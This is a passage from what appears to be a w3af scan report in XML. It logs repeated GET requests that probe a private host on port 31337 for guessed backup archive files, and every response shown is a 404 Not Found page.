                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="215">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="216">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="217">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="218">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="219">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="220">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="221">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="222">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="223">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="224">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="225">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="226">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="227">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="228">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="229">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="230">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="232">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="233">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="235">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="236">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
